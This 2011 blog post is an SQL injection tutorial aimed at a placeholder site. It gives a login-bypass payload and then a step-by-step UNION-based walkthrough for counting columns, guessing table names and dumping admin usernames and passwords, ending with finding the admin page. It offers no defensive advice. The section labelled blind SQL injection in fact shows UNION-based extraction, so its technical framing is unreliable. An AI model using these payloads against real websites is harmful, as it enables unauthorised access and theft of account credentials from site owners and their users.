Monday, June 20, 2011

Standard SQL Injection and Blind SQL Injection



An SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

Standard SQL Injection
Consider the following SQL query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that credentials exists, then the user is allowed to login to the system, otherwise the access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request that we'll carry out will be:

http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1

After a short analysis we notice that the query returns a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password.

Blind SQL Injection
We have pointed out that there is another category of SQL injection, called Blind SQL Injection, in which nothing is known on the outcome of an operation. For example, this behavior happens in cases where the programmer has created a custom error page that does not reveal anything on the structure of the query or on the database. (The page does not return a SQL error, it may just return a HTTP 500).

By using the inference methods, it is possible to avoid this obstacle and thus to succeed to recover the values of some desired fields. This method consists of carrying out a series of boolean queries to the server, observing the answers and finally deducing the meaning of such answers. We consider, as always, the www.example.com domain and we suppose that it contains a parameter named id vulnerable to SQL injection. This means that carrying out the following request:

http://www.example.com/index.php?id=1' or
http://www.example.com/index.php?id=-1 or anything else.

we will get one page with a custom message error which is due to a syntactic error in the query.

find and count to amount the table in database.
use the command : order by
http://www.example.com/index.php?id=-1+order+by+1--

check step by step…
ex: http://www.example.com/index.php?id=-1+order+by+1--
http://www.example.com/index.php?id=-1+order+by+2--
http://www.example.com/index.php?id=-1+order+by+3--
http://www.example.com/index.php?id=-1+order+by+4--

so it appears error message or missing error…
http://www.example.com/index.php?id=-1+order+by+5--

than we take is up to number 4
http://www.example.com/index.php?id=-1+order+by+4--

For show the numbers that appear use the union because error until 5, we can do with: http://www.example.com/index.php?id=-1+union+select+1,2,3,4--

Find The Table

We can use our logic example the table is admin, admins, login, logins, user, users with use command +from+(table_name)--

http://www.example.com/index.php?id=-1+union+select+1,2,3,4+from+admin--
if ain't error and we can see the number is appear for example 2

Find The Username and Password Colomn

For username use logic again, example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

Remember, number 2 is appear so we change with

http://www.example.com/index.php?id=-1+union+select+1,username,3,4+from+admin--
example appear : admin
admin is username

For password use our logic again, example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

http://www.example.com/index.php?id=-1+union+select+1,password,3,4+from+admin--
example appear : 123456
123456 is password

Finally, the last step we must find admin page:
ex : example.com/admin

0 comments:

Post a Comment